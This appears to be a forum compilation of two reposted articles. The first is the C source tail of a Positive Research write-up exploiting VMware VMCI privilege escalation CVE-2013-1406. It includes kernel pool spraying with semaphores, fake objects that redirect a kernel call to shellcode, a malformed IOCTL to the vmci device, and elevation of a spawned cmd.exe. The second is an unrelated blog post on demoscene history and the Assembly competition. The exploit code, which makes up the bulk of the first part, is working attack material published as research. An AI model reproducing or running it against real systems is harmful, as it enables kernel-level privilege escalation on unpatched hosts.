        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) &&
            (pHandleTable->Handles[i].HandleValue == hObject)) {
            pResult = (HANDLE)pHandleTable->Handles[i].Object;
            break;
        }
    }

    return pResult;
}

void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable,
                      HANDLE hObject, DWORD dwProcessID = 0)
{
    DWORD dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL) {
        printf("Ain't funny\n");
        return;
    }

    if (dwLookupProcessID == 0) {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) &&
            (pHandleTable->Handles[i].HandleValue == hObject)) {
            pHandleTable->Handles[i].Object = NULL;
            pHandleTable->Handles[i].HandleValue = NULL;
            break;
        }
    }

    return;
}

void PoolSpray()
{
    // Init used native API function
    lpNtQuerySystemInformation NtQuerySystemInformation =
        (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"),
                                                   "NtQuerySystemInformation");
    if (NtQuerySystemInformation == NULL) {
        printf("Such a fail...\n");
        return;
    }

    // Determine object size
    // xp:
    //const DWORD_PTR dwSemaphoreSize = 0x38;
    // 7:
    //const DWORD_PTR dwSemaphoreSize = 0x48;
    DWORD_PTR dwSemaphoreSize = 0;
    if (LOBYTE(GetVersion()) == 5) {
        dwSemaphoreSize = 0x38;
    }
    else if (LOBYTE(GetVersion()) == 6) {
        dwSemaphoreSize = 0x48;
    }

    unsigned int cycleCount = 0;
    while (cycleCount < 50000) {
        HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL);
        if (hTemp == NULL) {
            break;
        }
        ++cycleCount;
    }
    printf("\t[+] Spawned lots of semaphores\n");
    printf("\t[.] Initing pool windows\n");
    Sleep(2000);

    DWORD dwNeeded = 4096;
    NTSTATUS status = 0xFFFFFFFF;
    PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE);
    while (true) {
        status = NtQuerySystemInformation(SystemExtendedHandleInformation,
                                          pBuf, dwNeeded, NULL);
        if (status != STATUS_SUCCESS) {
            dwNeeded *= 2;
            VirtualFree(pBuf, 0, MEM_RELEASE);
            pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE);
        }
        else {
            break;
        }
    };

    HANDLE hHandlesToClose[0x30] = {0};
    DWORD dwCurPID = GetCurrentProcessId();
    PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf;

    for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++) {
        if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID) {
            DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object;
            DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue;
            DWORD_PTR dwWindowAddress = 0;
            bool bPoolWindowFound = false;
            UINT iObjectsNeeded = 0;

            // Needed window size is vmci packet pool chunk size (0x218) divided by
            // Semaphore pool chunk size (dwSemaphoreSize)
            iObjectsNeeded = (0x218 / dwSemaphoreSize) +
                             ((0x218 % dwSemaphoreSize != 0) ? 1 : 0);

            if (
                // Not on a page boundary
                ((dwTestObjAddr & 0xFFF) != 0) &&
                // Doesn't cross page boundary
                (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000))
               ) {
                // Check previous object for being our semaphore
                DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize;
                if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL) {
                    continue;
                }

                for (unsigned int j = 1; j < iObjectsNeeded; j++) {
                    DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize);
                    HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr);

                    //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal);
                    //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr);
                    //printf("\tLooked up handle = %08X\n", hLookedUp);

                    if (hLookedUp != NULL) {
                        hHandlesToClose[j] = hLookedUp;

                        if (j == iObjectsNeeded - 1) {
                            // Now test the following object
                            dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize);
                            if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL) {
                                hHandlesToClose[0] = (HANDLE)dwTestHandleVal;
                                bPoolWindowFound = true;
                                dwWindowAddress = dwTestObjAddr;

                                // Close handles to create a memory window
                                for (int k = 0; k < iObjectsNeeded; k++) {
                                    if (hHandlesToClose[k] != NULL) {
                                        CloseHandle(hHandlesToClose[k]);
                                        CloseTableHandle(pHandleTable, hHandlesToClose[k]);
                                    }
                                }
                            }
                            else {
                                memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                                break;
                            }
                        }
                    }
                    else {
                        memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                        break;
                    }
                }

                if (bPoolWindowFound) {
                    printf("\t[+] Window found at %08X!\n", dwWindowAddress);
                }
            }
        }
    }

    VirtualFree(pBuf, 0, MEM_RELEASE);
    return;
}

void InitFakeBuf(PVOID pBuf, DWORD dwSize)
{
    if (pBuf != NULL) {
        RtlFillMemory(pBuf, dwSize, 0x11);
    }
    return;
}

void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep)
{
    /*
        Previous chunk size will be always 0x43 and the pool index will be 0,
        so the last bytes will be 0x0043

        So, for every 0xXXXX0043 address we must suffice the following conditions:

        lea edx, [eax+38h]
        lock xadd [edx], ecx
        cmp ecx, 1

        Some sort of lock at [addr + 38] must be equal to 1.

        And

        call dword ptr [eax+0ACh]

        The call site is located at [addr + 0xAC]

        Also fake the object to be dereferenced at [addr + 0x100]
    */
    if (pBuf != NULL) {
        for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep) {
            PDWORD pLock = (PDWORD)(iAddr + 0x38);
            PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC);
            PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100);

            *pLock = 1;
            *pCallMeMayBe = (DWORD_PTR)FireShell;
            *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000;
        }
    }
    return;
}

void PenetrateVMCI()
{
    /*
        VMware Security Advisory

        Advisory ID: VMSA-2013-0002
        Synopsis:    VMware ESX, Workstation, Fusion, and View VMCI privilege
                     escalation vulnerability
        Issue date:  2013-02-07
        Updated on:  2013-02-07 (initial advisory)
        CVE numbers: CVE-2013-1406
    */
    DWORD dwPidToElevate = 0;
    HANDLE hSuspThread = NULL;

    bool bXP = (LOBYTE(GetVersion()) == 5);
    bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1));
    bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2));

    if (!InitKernelFuncs()) {
        printf("[-] Like I don't know where the shellcode functions are\n");
        return;
    }

    if (bXP) {
        printf("[?] Who do we want to elevate?\n");
        scanf_s("%d", &dwPidToElevate);
        hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate);
        if (hProcessToElevate == NULL) {
            printf("[-] This process doesn't want to be elevated\n");
            return;
        }
    }

    if (b7 || b8) {
        // We are unable to change an active process token on-the-fly,
        // so we create a custom shell suspended (Ionescu hack)
        STARTUPINFO si = {0};
        PROCESS_INFORMATION pi = {0};
        si.wShowWindow = TRUE;

        WCHAR cmdPath[MAX_PATH] = {0};
        GetSystemDirectory(cmdPath, MAX_PATH);
        wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe");

        if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE,
                          CREATE_SUSPENDED | CREATE_NEW_CONSOLE,
                          NULL, NULL, &si, &pi) == TRUE) {
            hProcessToElevate = pi.hProcess;
            hSuspThread = pi.hThread;
        }
    }

    HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE,
                                    FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                                    OPEN_EXISTING, NULL, NULL);

    if (hVMCIDevice != INVALID_HANDLE_VALUE) {
        UCHAR BadBuff[0x624] = {0};
        UCHAR retBuf[0x624] = {0};
        DWORD dwRet = 0;

        printf("[+] VMCI service found running\n");

        PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff;
        pVmReq->Header.RequestSize = 0xFFFFFFF0;

        PVOID pShellSprayBufStd = NULL;
        PVOID pShellSprayBufQtd = NULL;
        PVOID pShellSprayBufStd7 = NULL;
        PVOID pShellSprayBufQtd7 = NULL;
        PVOID pShellSprayBufChk8 = NULL;

        if ((b7) || (bXP) || (b8)) {
            /*
                Significant bits of a PoolType of a chunk define the following regions:

                0x0A000000 - 0x0BFFFFFF - Standard chunk
                0x1A000000 - 0x1BFFFFFF - Quoted chunk
                0x0 - 0xFFFFFFFF - Free chunk - no idea

                Addon for Windows 7:
                Since PoolType flags have changed, and "In use flag" is now 0x2,
                define an additional region for Win7:

                0x04000000 - 0x06000000 - Standard chunk
                0x14000000 - 0x16000000 - Quoted chunk
            */
            pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000,
                                             MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000,
                                             MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000,
                                              MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000,
                                              MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

            // Note: the originally published PoC tested pShellSprayBufQtd four
            // times here; the intent is clearly to test all four buffers
            if ((pShellSprayBufStd == NULL) || (pShellSprayBufQtd == NULL) ||
                (pShellSprayBufStd7 == NULL) || (pShellSprayBufQtd7 == NULL)) {
                printf("\t[-] Unable to map the needed memory regions, please try running the app again\n");
                CloseHandle(hVMCIDevice);
                return;
            }

            InitFakeBuf(pShellSprayBufStd, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd, 0x2000000);
            InitFakeBuf(pShellSprayBufStd7, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd7, 0x2000000);

            PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000);

            if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE) {
                SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
            }

            PoolSpray();

            if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff),
                                retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE) {
                printf("\t[!] If you don't see any BSOD, you're successful\n");
                if (b7 || b8) {
                    ResumeThread(hSuspThread);
                }
            }
            else {
                printf("[-] Not this time %d\n", GetLastError());
            }

            if (pShellSprayBufStd != NULL) {
                VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE);
            }
            if (pShellSprayBufQtd != NULL) {
                VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE);
            }
        }

        SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);
        CloseHandle(hVMCIDevice);
    }
    else {
        printf("[-] Like I don't see vmware here\n");
    }

    CloseHandle(hProcessToElevate);
    return;
}

References
[1] Tarjei Mandt. Kernel Pool Exploitation on Windows 7. Black Hat DC, 2011
[2] Nikita Tarakanov. Kernel Pool Overflow from Windows XP to Windows 8. ZeroNights, 2011
[3] Kostya Kortchinsky. Real world kernel pool exploitation. SyScan, 2008
[4] SoBeIt. How to exploit Windows kernel memory pool. X'con, 2005

Video Demonstration:

Author: Artem Shishkin, Positive Research.

Sursa: Positive Research Center: Stars aligner’s how-to: kernel pool spraying and VMware CVE-2013-1406
25. How Scary Can An Old-School Programmer Be?

March 5, 2013 Tyler Durden

Recently Eugene Kaspersky wrote in his blog a post about the so-called Big Comeback of old-school virus writers. I am old enough to remember those guys and their brilliant work – I don't necessarily mean malware creators, I'm talking about programmers, coders and assembler masters. They are like the Jedi and the Sith of the Old Empire, whom all the Skywalker-saga heroes considered much more powerful and skilled with the light sabers (no kiddin', ask Yoda). And I thought… damn… there are probably around 3 people left out there who witnessed the true power of those people (me, Kaspersky and Bill Gates). Seriously – since it is quite hard to understand what an old-school hacker is capable of, I decided to show you what Eugene was talking about, so you could decide for yourself whether this is scary news.

Extreme workout for stupid calculators

Back in 1992 computers were basically smart calculators with big screens (this is not a joke, kids). But there were several groups of enthusiasts who were happy to face software challenges: some programmers managed to create code that used every byte of memory, every processor function and register, every OS command and, what is most important, 100% of hardware power – squeezed it all to the last drop and checked out the result. I have to point out that in order to truly nail those tasks, one has to be damn creative, drink a lot of coffee (or smoke a lot of weed, let's be honest) – and have an insane IQ level. The movement itself started around 1988, basically together with the first more or less widely spread version of MS-DOS. It had no official name, but according to the laws of evolution, sooner or later they'd have to compete. And this is how "Assembly" was born in 1992.
Future Crew is back from the future

In 1992 a group of Scandinavian coders called "Future Crew", together with their friends from the "Complex" and "Amiga" programming groups, organized an event called "The Assembly" in order to share the results of their kick-ass work in the Assembler language and compete for the title of the Best Coder of the year. There were several disciplines, but the two most interesting were platform (PC, Amiga, C64) demos and PC 64k. The first had the goal of demonstrating the most elegant coding solutions and the best abilities of the hardware with minimalistic and optimal code. The second was a tricky one – coders were limited to 64kb: their compiled programs (meaning the ready-to-run file(s)) could not be more than 64 kilobytes – that's why this nomination turned out to be a contest of codin' elegance. A coding demo is basically a scripted series of events programmed to demonstrate the capabilities of hardware and/or top software solutions for a particular task, such as complex physics calculations.

Back in 1992 the Future Crew won the competition with their "Unreal" demo. Here it is (note that this is 1992 and there's no Windows yet. This demo was called Unreal for a reason – nobody(!) had performed anything like that before):

They were the first to demonstrate a working 3D environment model, layers of graphics, complex physics and lighting calculations, etc. And the whole compiled code was about 1 megabyte (including music! – and let me point out that there was no mp3 compression yet). The only way to achieve such a result was mastering Assembler – in my opinion, the most complex programming language ever. Just so you have an idea of what Assembler is, here is what the guys from Future Crew told me years ago:

Learning to code demos is a long and very very difficult process. It takes years to learn to code demos very well. A good way to start is some high level language like Pascal or C and then start to experiment with assembler.
It takes a lot of time and experimenting to get better, and there are no shortcuts. The main thing is trying to understand what you do, then trying to change the program to see what you get, and gain wisdom in what's the best way of doing things. Learning to code well requires a lot of patience, a lot of enthusiasm and a lot of time. It is not easy.

Basically, those who were engaged in the competition turned out to become The Ultimate Source of inspiration for all software developers. I'm not saying that someone was stealing their ideas, no – everyone was just… adopting their creative vision. Most products we have today – ALL GAMES, Adobe graphics and video products, meteo and GPS, Google Earth… all of those multibillion-dollar products were inspired by Assembly at a certain point. (BTW – filming and photo shooting are strictly forbidden inside the event's room – violators are banned forever.)

1993 – the year of "Second Reality" and Eclipse

The Assembly turned out to be such a success that the next year the number of attendees and presented demos doubled (the trend was pretty constant; since 1999 the Assembly takes place in the biggest football arena in Helsinki (Finland), which fits ~5,000 attendees from all over the globe). In 1993 Future Crew presented something… fantastic, something that set the quality bar for all further contests and changed the programming world forever – the Second Reality demo:

It is essential to understand that this demo was created BEFORE Intel presented their Pentium processors (Intel announced it on 22 March, the first Pentium PCs shipped only in 1994, and the Assembly usually takes place in summer – July/August. It means that Future Crew showed Second Reality at least half a year before Pentium shipments started). It means that all those fantastic graphics and sounds were achieved on 486 CPUs with primitive sound blasters and no 3D graphics cards.
This demo blew away the jury and the coding community – it showed what results could be achieved with pro-level Assembler work and a minimalistic approach (the compiled code of Second Reality was about 1.5 megabytes). This year made Future Crew world famous. This is a "behind the scenes" video of Future Crew while they were working on Second Reality:

In 1994, the demo "Verses" (by the EMC group) won first place. Basically, they showed the world that realistic water physics calculations could be done and that any morphing of 3D objects within Pentium speed limits was a piece of cake:

And this 64kb winner – "Airframe" by the Prime group – is the mother and father of all modern 3D aviation and space simulators:

Just so you get an idea of how quickly the code evolved, here's a list of all winners from 1995 to 2012.

1995 Assembly Winner: "Stars" by NoooN group

1996 Assembly Winner: "Machines of Madness" by Dubius group

1997 Assembly Winner: "Boost" by Doomsday group

1998 Assembly Winner: "Gateways" by Trauma group
http://www.youtube.com/watch?feature=player_embedded&v=QgGmbqIqX_A

By the way – this is the ancestor of the World of Warcraft visual realisation. This is when the 3D MMORPG visuals were created.

In 1999 the 3DFX technology changed the graphics forever. And the demo by the Maturefurk group called "Virhe" blew everybody's minds away:

Assembly revised

In 2000 the rules changed a bit – instead of competing in 3 categories (Amiga, PC and C64), they started to compete in the "Combined Demo", "Oldschool demo" and "64kb limit intro" categories. The 64k competition became obsolete in 2010, but at the end of this post you'll see some really fantastic examples of what a pro assembler coder can fit within 64 kilobytes. This is the list of winners in the Combined Demo category, which is the most brilliant in terms of Assembler mastery:

2000 first prize winner was "Spot" by the Exceed group. Check out the lighting effects… they are amazing – remember, this is 13-year-old technology!
2001 Assembly Winner was "Lapsuus" by the Maturefurk group.

2002 Assembly winner was "Liquid… Wen?" by the Haujobb group
http://www.youtube.com/watch?feature=player_embedded&v=Ae8UK9mscWg

I have to point out the fact that all graphics, including faces and characters, in all Assembly demos are drawn ONLY using code – those are not picture files included in the demo. No, sir!

2003 Assembly Winner was "Legomania" by Doomsday. Say hello to all 3D console games:) And I'm sure that this is the time when the new Nintendo Wii vision was born:
http://www.youtube.com/watch?feature=player_embedded&v=gU70QGtkUm0

2004 first prize went to "Obsoleet" by Unreal Voodoo
http://www.youtube.com/watch?feature=player_embedded&v=MUWskk0k6XU

2005 first prize of Assembly went to "Iconoclast" by the ASD group:
http://www.youtube.com/watch?feature=player_embedded&v=CAKMa8-LA9w

In 2006 the demo "Starstruck" by The Black Lotus coding group blasted the community again with the level of sophistication of its graphics coding. I'd say they raised the bar a lot:
http://www.youtube.com/watch?feature=player_embedded&v=-wtMEBPWeMo

2007 winner of Assembly was "LifeForce" by ASD.
And this was, once again, a piece of fantastic Assembler work:
http://www.youtube.com/watch?feature=player_embedded&v=PDWGLLJLLLk

2008 was the year of "Within Epsilon" by Pyrotech:
http://www.youtube.com/watch?feature=player_embedded&v=4YvYnHvhI_E

The 2009 winner is one of my personal favourites – "Frameranger" by the Fairlight, CNCD & Orange groups:
http://www.youtube.com/watch?feature=player_embedded&v=luhHghCAEaQ

In 2010 "Happiness is right around the bend" by ASD showed a fantastic tank:
http://www.youtube.com/watch?feature=player_embedded&v=z8wfYd9Y-_4

2011 Assembly winner was "Spin" by ASD:
http://www.youtube.com/watch?feature=player_embedded&v=T_U3Zdv8to8

2012 was phenomenal – "Spacecut" by Carillon & Cyberiad (CNCD):
http://www.youtube.com/watch?feature=player_embedded&v=eJF-kdutNxs

64 kilobytes limit best examples

Just so you get an idea of what a professional programmer can do within 64 kilobytes: this is the best of 2005 – "Che Guevara" by Fairlight
http://www.youtube.com/watch?feature=player_embedded&v=bG-6PbGKzcE

I repeat – this is 64 kilobytes of assembler code. Not a byte more. But 3 years later, in 2008, the same group demonstrated immense technological progress and managed to fit within 64kb a demo like this one – "Panic room" – and won the first prize in this category:
http://www.youtube.com/watch?feature=player_embedded&v=MQZ1qGENxP8

But the best 64k demo EVER presented was "X marks the spot" by Portal Process in 2010 – first prize winner of Assembly in the 64k category:
http://www.youtube.com/watch?feature=player_embedded&v=OhAx2c0U5WA

And now… let me draw you a small picture here…

All those demos, especially the ones limited to 64kb, show the results a talented old-school programmer can deliver when he puts his mind to it, but, what is more important, when he is a Master of Assembler – something that is not very common nowadays, when most products are created in visual, so-called "high-level" programming languages, such as Visual C and Objective-C.
Just imagine for a second that a programmer like this, or a group like Future Crew, decides to forget all the 3D creativity, the music and the physics, drop all this enthusiasm and focus on just one goal – create a small piece of code that steals your financial data or helps to re-calibrate a nuclear reactor. What do you think, would they succeed? How long would the code be, if 64 kilobytes is more than enough? Would they find a way to break the Windows or Apple integrated security systems? Are they mobile? Are they flexible? Do they have the finances to make this happen, if they have been running free 5,000-attendee events for 20 years?

I don't want to tell you the answer. You have to decide for yourself. But when I hear someone saying "My PC does not require protection", I can't help but remember "Second Reality" and start praying. Thank God the guys who were Future Crew are now very busy – if you're the best at coding demos, why not make it your business, right? Next time you run a 3DMark 2011 test on your PC – think of Unreal, Second Reality and Future Crew.

Future Crew as a team did not release anything after Scream Tracker 3 (December 1994). While it was never officially dissolved, its members parted ways in the second half of the 1990s. Companies like Futuremark (3DMark), Remedy (Death Rally, Max Payne, Alan Wake), Bugbear Entertainment (FlatOut, Glimmerati, Rally Trophy), Bitboys (a graphics hardware company) and Recoil Games (Rochard) were all started in whole or in part by members of Future Crew.

I want to thank all of them – they changed the world forever and showed us that everything is possible if you put your mind to it. Including Kaspersky Internet Security. Thank you for your inspiration, guys. And deep inside my head I hope that not a single programmer who was part of The Assembly would ever use his/her skills for evil purposes.

Sursa: How Scary Can An Old-School Programmer Could Be?